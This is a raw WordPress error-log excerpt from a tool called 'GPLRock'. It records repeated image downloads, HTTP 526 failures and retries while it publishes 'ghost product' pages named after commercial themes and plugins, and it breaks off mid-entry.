[05-Apr-2026 15:26:55 UTC] GPLRock WARNING: Image download failed for product ukko-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ukko---personal-portfolio-wordpress-theme-6204.webp [05-Apr-2026 15:26:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ukko-personal-portfolio-wordpress-theme [05-Apr-2026 15:27:20 UTC] GPLRock: Image downloaded successfully for product oceanwp-cookie-notice (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-88b77158.jpg [05-Apr-2026 15:27:20 UTC] GPLRock: Using pre-downloaded image for product oceanwp-cookie-notice: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-88b77158.jpg [05-Apr-2026 15:27:20 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-cookie-notice [05-Apr-2026 15:27:22 UTC] GPLRock: Image downloaded successfully for product oceanwp-sticky-header (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-240a7c4b.jpg [05-Apr-2026 15:27:22 UTC] GPLRock: Using pre-downloaded image for product oceanwp-sticky-header: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-240a7c4b.jpg [05-Apr-2026 15:27:22 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-sticky-header [05-Apr-2026 15:27:23 UTC] GPLRock: Image downloaded successfully for product oceanwp-side-panel (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3460ed8.jpg [05-Apr-2026 15:27:23 UTC] GPLRock: Using pre-downloaded image for product oceanwp-side-panel: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3460ed8.jpg [05-Apr-2026 15:27:23 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-side-panel [05-Apr-2026 15:27:25 UTC] GPLRock: Image downloaded successfully for product oceanwp-sticky-footer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ef34f670.jpg [05-Apr-2026 15:27:25 UTC] GPLRock: Using pre-downloaded image for product oceanwp-sticky-footer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ef34f670.jpg [05-Apr-2026 15:27:25 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-sticky-footer [05-Apr-2026 15:27:35 UTC] GPLRock: Image download failed for product oceanwp-portfolio (attempt 1/3). HTTP Code: 0, Error: Connection timed out after 10002 milliseconds. Retrying... [05-Apr-2026 15:27:38 UTC] GPLRock: Image downloaded successfully for product oceanwp-portfolio (attempt 2) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af365ca8.jpg [05-Apr-2026 15:27:38 UTC] GPLRock: Using pre-downloaded image for product oceanwp-portfolio: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af365ca8.jpg [05-Apr-2026 15:27:38 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-portfolio [05-Apr-2026 15:27:40 UTC] GPLRock: Image downloaded successfully for product affiliatewp-recurring-referrals (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2648f4d0.jpg [05-Apr-2026 15:27:40 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-recurring-referrals: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2648f4d0.jpg [05-Apr-2026 15:27:40 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-recurring-referrals [05-Apr-2026 15:27:41 UTC] GPLRock: Image downloaded successfully for product affiliatewp-tiered-affiliate-rates (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0fe5f406.jpg [05-Apr-2026 15:27:41 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-tiered-affiliate-rates: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0fe5f406.jpg [05-Apr-2026 15:27:41 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-tiered-affiliate-rates [05-Apr-2026 15:27:43 UTC] GPLRock: Image downloaded successfully for product analytify-pro-email-notifications-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f7e3d62.jpg [05-Apr-2026 15:27:43 UTC] GPLRock: Using pre-downloaded image for product analytify-pro-email-notifications-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f7e3d62.jpg [05-Apr-2026 15:27:43 UTC] GPLRock: Ghost product published with image - Product ID: analytify-pro-email-notifications-add-on [05-Apr-2026 15:27:44 UTC] GPLRock: Image downloaded successfully for product analytify-pro-google-analytics-goals-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a7042c05.jpg [05-Apr-2026 15:27:44 UTC] GPLRock: Using pre-downloaded image for product analytify-pro-google-analytics-goals-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a7042c05.jpg [05-Apr-2026 15:27:44 UTC] GPLRock: Ghost product published with image - Product ID: analytify-pro-google-analytics-goals-add-on [05-Apr-2026 15:27:46 UTC] GPLRock: Image downloaded successfully for product analytify-pro-easy-digital-downloads-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f701d3db.jpg [05-Apr-2026 15:27:46 UTC] GPLRock: Using pre-downloaded image for product analytify-pro-easy-digital-downloads-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f701d3db.jpg [05-Apr-2026 15:27:46 UTC] GPLRock: Ghost product published with image - Product ID: analytify-pro-easy-digital-downloads-add-on [05-Apr-2026 15:29:22 UTC] GPLRock: Image downloaded successfully for product loftloader-pro-preloader-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72018f89.jpg [05-Apr-2026 15:29:22 UTC] GPLRock: Using pre-downloaded image for product loftloader-pro-preloader-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72018f89.jpg [05-Apr-2026 15:29:22 UTC] GPLRock: Ghost product published with image - Product ID: loftloader-pro-preloader-plugin-for-wordpress [05-Apr-2026 15:29:24 UTC] GPLRock: Image downloaded successfully for product envira-gallery-tags-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9bcc40f.jpg [05-Apr-2026 15:29:24 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-tags-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9bcc40f.jpg [05-Apr-2026 15:29:24 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-tags-addon [05-Apr-2026 15:29:26 UTC] GPLRock: Image downloaded successfully for product envira-gallery-albums-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-839a3bd6.jpg [05-Apr-2026 15:29:26 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-albums-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-839a3bd6.jpg [05-Apr-2026 15:29:26 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-albums-addon [05-Apr-2026 15:29:27 UTC] GPLRock: Image downloaded successfully for product mythemeshop-reader-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2a5089f3.jpg [05-Apr-2026 15:29:28 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-reader-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2a5089f3.jpg [05-Apr-2026 15:29:28 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-reader-wordpress-theme [05-Apr-2026 15:29:29 UTC] GPLRock: Image downloaded successfully for product woocommerce-one-page-shopping (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0abeaf40.jpg [05-Apr-2026 15:29:29 UTC] GPLRock: Using pre-downloaded image for product woocommerce-one-page-shopping: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0abeaf40.jpg [05-Apr-2026 15:29:29 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-one-page-shopping [05-Apr-2026 15:29:31 UTC] GPLRock: Image downloaded successfully for product yith-infinite-scrolling-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98e8d30e.jpg [05-Apr-2026 15:29:31 UTC] GPLRock: Using pre-downloaded image for product yith-infinite-scrolling-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98e8d30e.jpg [05-Apr-2026 15:29:31 UTC] GPLRock: Ghost product published with image - Product ID: yith-infinite-scrolling-premium [05-Apr-2026 15:29:32 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-custom-order-status-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aa79265a.jpg [05-Apr-2026 15:29:32 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-custom-order-status-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aa79265a.jpg [05-Apr-2026 15:29:32 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-custom-order-status-premium [05-Apr-2026 15:29:34 UTC] GPLRock: Image downloaded successfully for product userpro-woocommerce-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a2b0d54.jpg [05-Apr-2026 15:29:34 UTC] GPLRock: Using pre-downloaded image for product userpro-woocommerce-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a2b0d54.jpg [05-Apr-2026 15:29:34 UTC] GPLRock: Ghost product published with image - Product ID: userpro-woocommerce-integration [05-Apr-2026 15:29:35 UTC] GPLRock: Image downloaded successfully for product studiopress-slush-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f674e913.jpg [05-Apr-2026 15:29:35 UTC] GPLRock: Using pre-downloaded image for product studiopress-slush-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f674e913.jpg [05-Apr-2026 15:29:35 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-slush-pro-genesis-wordpress-theme [05-Apr-2026 15:29:37 UTC] GPLRock: Image downloaded successfully for product gravity-forms-mailgun-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-85ca1b3d.jpg [05-Apr-2026 15:29:37 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-mailgun-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-85ca1b3d.jpg [05-Apr-2026 15:29:37 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-mailgun-addon [05-Apr-2026 15:31:19 UTC] GPLRock: Image download failed for product image-hotspot-and-tooltip-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:21 UTC] GPLRock: Image download failed for product image-hotspot-and-tooltip-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-hotspot-and-tooltip-for-wpbakery-page-builder-33045.webp for product image-hotspot-and-tooltip-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:31:23 UTC] GPLRock: Image download failed for product image-hotspot-and-tooltip-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:25 UTC] GPLRock: Image download failed for product image-hotspot-and-tooltip-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-hotspot-and-tooltip-for-wpbakery-page-builder-33045.webp for product image-hotspot-and-tooltip-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:31:27 UTC] GPLRock WARNING: Image download failed for product image-hotspot-and-tooltip-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/image-hotspot-and-tooltip-for-wpbakery-page-builder-33045.webp [05-Apr-2026 15:31:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: image-hotspot-and-tooltip-for-wpbakery-page-builder [05-Apr-2026 15:31:28 UTC] GPLRock: Image download failed for product conditional-content-blocks-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:30 UTC] GPLRock: Image download failed for product conditional-content-blocks-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conditional-content-blocks-for-nex-forms-7920.webp for product conditional-content-blocks-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:31:32 UTC] GPLRock: Image download failed for product conditional-content-blocks-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:34 UTC] GPLRock: Image download failed for product conditional-content-blocks-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conditional-content-blocks-for-nex-forms-7920.webp for product conditional-content-blocks-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:31:36 UTC] GPLRock WARNING: Image download failed for product conditional-content-blocks-for-nex-forms. URL: https://meldwp.com/wp-content/uploads/conditional-content-blocks-for-nex-forms-7920.webp [05-Apr-2026 15:31:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: conditional-content-blocks-for-nex-forms [05-Apr-2026 15:31:36 UTC] GPLRock: Image download failed for product elegant-tabs-for-beaver-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:38 UTC] GPLRock: Image download failed for product elegant-tabs-for-beaver-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elegant-tabs-for-beaver-builder-32625.webp for product elegant-tabs-for-beaver-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:31:41 UTC] GPLRock: Image download failed for product elegant-tabs-for-beaver-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:43 UTC] GPLRock: Image download failed for product elegant-tabs-for-beaver-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elegant-tabs-for-beaver-builder-32625.webp for product elegant-tabs-for-beaver-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:31:45 UTC] GPLRock WARNING: Image download failed for product elegant-tabs-for-beaver-builder. URL: https://meldwp.com/wp-content/uploads/elegant-tabs-for-beaver-builder-32625.webp [05-Apr-2026 15:31:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elegant-tabs-for-beaver-builder [05-Apr-2026 15:31:45 UTC] GPLRock: Image download failed for product custom-content-pack-for-fusion-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:47 UTC] GPLRock: Image download failed for product custom-content-pack-for-fusion-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-content-pack-for-fusion-builder-24599.webp for product custom-content-pack-for-fusion-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:31:49 UTC] GPLRock: Image download failed for product custom-content-pack-for-fusion-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:51 UTC] GPLRock: Image download failed for product custom-content-pack-for-fusion-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-content-pack-for-fusion-builder-24599.webp for product custom-content-pack-for-fusion-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:31:53 UTC] GPLRock WARNING: Image download failed for product custom-content-pack-for-fusion-builder. URL: https://meldwp.com/wp-content/uploads/custom-content-pack-for-fusion-builder-24599.webp [05-Apr-2026 15:31:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-content-pack-for-fusion-builder [05-Apr-2026 15:31:54 UTC] GPLRock: Image downloaded successfully for product online-cake-and-cupcake-design-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-429fd88c.webp [05-Apr-2026 15:31:54 UTC] GPLRock: Using pre-downloaded image for product online-cake-and-cupcake-design-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-429fd88c.webp [05-Apr-2026 15:31:54 UTC] GPLRock: Ghost product published with image - Product ID: online-cake-and-cupcake-design-for-woocommerce [05-Apr-2026 15:31:54 UTC] GPLRock: Image download failed for product liner-svg-animation-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:56 UTC] GPLRock: Image download failed for product liner-svg-animation-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:31:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liner--svg-animation-for-elementor-27296.webp for product liner-svg-animation-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:31:58 UTC] GPLRock: Image download failed for product liner-svg-animation-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:00 UTC] GPLRock: Image download failed for product liner-svg-animation-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liner--svg-animation-for-elementor-27296.webp for product liner-svg-animation-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:32:02 UTC] GPLRock WARNING: Image download failed for product liner-svg-animation-for-elementor. URL: https://meldwp.com/wp-content/uploads/liner--svg-animation-for-elementor-27296.webp [05-Apr-2026 15:32:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: liner-svg-animation-for-elementor [05-Apr-2026 15:32:03 UTC] GPLRock: Image download failed for product control-locations-wordpress-map-finder-plugin-for-store-locator-service-center (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:05 UTC] GPLRock: Image download failed for product control-locations-wordpress-map-finder-plugin-for-store-locator-service-center (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/control-locations---wordpress-map-finder-plugin-for-store-locator--service-cente-2360.webp for product control-locations-wordpress-map-finder-plugin-for-store-locator-service-center after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:32:07 UTC] GPLRock: Image download failed for product control-locations-wordpress-map-finder-plugin-for-store-locator-service-center (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:09 UTC] GPLRock: Image download failed for product control-locations-wordpress-map-finder-plugin-for-store-locator-service-center (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/control-locations---wordpress-map-finder-plugin-for-store-locator--service-cente-2360.webp for product control-locations-wordpress-map-finder-plugin-for-store-locator-service-center after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:32:11 UTC] GPLRock WARNING: Image download failed for product control-locations-wordpress-map-finder-plugin-for-store-locator-service-center. URL: https://meldwp.com/wp-content/uploads/control-locations---wordpress-map-finder-plugin-for-store-locator--service-cente-2360.webp [05-Apr-2026 15:32:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: control-locations-wordpress-map-finder-plugin-for-store-locator-service-center [05-Apr-2026 15:32:11 UTC] GPLRock: Image download failed for product woo-shortcodes-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:13 UTC] GPLRock: Image download failed for product woo-shortcodes-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woo-shortcodes-for-visual-composer-25822.webp for product woo-shortcodes-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:32:16 UTC] GPLRock: Image download failed for product woo-shortcodes-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:18 UTC] GPLRock: Image download failed for product woo-shortcodes-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woo-shortcodes-for-visual-composer-25822.webp for product woo-shortcodes-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:32:20 UTC] GPLRock WARNING: Image download failed for product woo-shortcodes-for-visual-composer. URL: https://meldwp.com/wp-content/uploads/woo-shortcodes-for-visual-composer-25822.webp [05-Apr-2026 15:32:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woo-shortcodes-for-visual-composer [05-Apr-2026 15:32:20 UTC] GPLRock: Image download failed for product templater-layout-builder-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:22 UTC] GPLRock: Image download failed for product templater-layout-builder-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/templater--layout-builder-for-elementor-3024.webp for product templater-layout-builder-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:32:24 UTC] GPLRock: Image download failed for product templater-layout-builder-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:26 UTC] GPLRock: Image download failed for product templater-layout-builder-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/templater--layout-builder-for-elementor-3024.webp for product templater-layout-builder-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:32:28 UTC] GPLRock WARNING: Image download failed for product templater-layout-builder-for-elementor. URL: https://meldwp.com/wp-content/uploads/templater--layout-builder-for-elementor-3024.webp [05-Apr-2026 15:32:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: templater-layout-builder-for-elementor [05-Apr-2026 15:32:29 UTC] GPLRock: Image download failed for product post-gallery-menu-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:31 UTC] GPLRock: Image download failed for product post-gallery-menu-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-gallery-menu-for-elementor-13515.webp for product post-gallery-menu-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:32:33 UTC] GPLRock: Image download failed for product post-gallery-menu-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:35 UTC] GPLRock: Image download failed for product post-gallery-menu-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:32:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-gallery-menu-for-elementor-13515.webp for product post-gallery-menu-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:32:37 UTC] GPLRock WARNING: Image download failed for product post-gallery-menu-for-elementor. URL: https://meldwp.com/wp-content/uploads/post-gallery-menu-for-elementor-13515.webp [05-Apr-2026 15:32:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: post-gallery-menu-for-elementor [05-Apr-2026 15:33:18 UTC] GPLRock: Image download failed for product kolyoum-creative-blog-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:20 UTC] GPLRock: Image download failed for product kolyoum-creative-blog-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kolyoum---creative-blog--news-wordpress-theme-14132.webp for product kolyoum-creative-blog-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:33:22 UTC] GPLRock: Image download failed for product kolyoum-creative-blog-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:24 UTC] GPLRock: Image download failed for product kolyoum-creative-blog-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kolyoum---creative-blog--news-wordpress-theme-14132.webp for product kolyoum-creative-blog-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:33:26 UTC] GPLRock WARNING: Image download failed for product kolyoum-creative-blog-news-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kolyoum---creative-blog--news-wordpress-theme-14132.webp [05-Apr-2026 15:33:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kolyoum-creative-blog-news-wordpress-theme [05-Apr-2026 15:33:27 UTC] GPLRock: Image download failed for product applied-essential-blog-theme-for-modern-content-creators (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:29 UTC] GPLRock: Image download failed for product applied-essential-blog-theme-for-modern-content-creators (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/applied---essential-blog-theme-for-modern-content-creators-12553.webp for product applied-essential-blog-theme-for-modern-content-creators after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:33:31 UTC] GPLRock: Image download failed for product applied-essential-blog-theme-for-modern-content-creators (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:33 UTC] GPLRock: Image download failed for product applied-essential-blog-theme-for-modern-content-creators (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/applied---essential-blog-theme-for-modern-content-creators-12553.webp for product applied-essential-blog-theme-for-modern-content-creators after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:33:35 UTC] GPLRock WARNING: Image download failed for product applied-essential-blog-theme-for-modern-content-creators. URL: https://meldwp.com/wp-content/uploads/applied---essential-blog-theme-for-modern-content-creators-12553.webp [05-Apr-2026 15:33:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: applied-essential-blog-theme-for-modern-content-creators [05-Apr-2026 15:33:35 UTC] GPLRock: Image download failed for product cedar-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:37 UTC] GPLRock: Image download failed for product cedar-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cedar---responsive-wordpress-blog-theme-26080.webp for product cedar-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:33:40 UTC] GPLRock: Image download failed for product cedar-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:42 UTC] GPLRock: Image download failed for product cedar-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cedar---responsive-wordpress-blog-theme-26080.webp for product cedar-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:33:44 UTC] GPLRock WARNING: Image download failed for product cedar-responsive-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/cedar---responsive-wordpress-blog-theme-26080.webp [05-Apr-2026 15:33:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cedar-responsive-wordpress-blog-theme [05-Apr-2026 15:33:44 UTC] GPLRock: Image download failed for product don-peppe-pizza-and-fast-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:46 UTC] GPLRock: Image download failed for product don-peppe-pizza-and-fast-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 